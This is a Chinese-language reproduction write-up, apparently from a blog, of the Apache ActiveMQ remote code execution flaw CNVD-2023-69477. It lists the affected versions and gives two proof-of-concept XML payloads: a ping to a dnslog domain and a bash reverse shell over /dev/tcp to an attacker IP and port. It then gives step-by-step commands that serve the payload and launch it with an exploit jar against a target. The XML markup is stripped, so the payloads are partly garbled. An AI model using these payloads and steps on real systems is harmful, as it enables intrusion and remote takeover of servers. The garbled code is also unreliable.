Apache ActiveMQ RCE漏洞复现

Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)

1、漏洞版本

Apache ActiveMQ < 5.18.3

Apache ActiveMQ < 5.17.6

Apache ActiveMQ < 5.16.7

Apache ActiveMQ < 5.15.16

2、POC

通过dnslog验证的poc.xml


 
  
   
     
       
        ping    
        ne5q0v.dnslog.cn 
       
     
   


反弹shell的poc.xml


    
        
            
            
                bash
                -c
                & /dev/tcp/ip/端口 0>&1]]>
            
            
        
    

3、复现过程

1、在本地含有poc.xml的文件夹下开启http服务

python -m http.server                  #默认端口为8000

可以正常访问即为开启成功

Apache ActiveMQ RCE漏洞复现_第1张图片

2、通过ActiveMQ-RCE.jar工具进行漏洞验证

java -jar ActiveMQ-RCE.jar tcp://目标ip:目标端口 http://开启http服务的ip:8000/poc.xml

3、命令执行成功,且在dnslog 平台收到dns请求记录
Apache ActiveMQ RCE漏洞复现_第2张图片

4、工具地址

ActiveMQ-RCE.jar

Apache ActiveMQ RCE漏洞复现_第3张图片

结束语:来自某吧的诗句

很多人看不到未来,其实是看到了未来
咖啡因来自咖啡果
苦难是生命的防沉迷系统

你可能感兴趣的:(web安全,apache,activemq,web安全)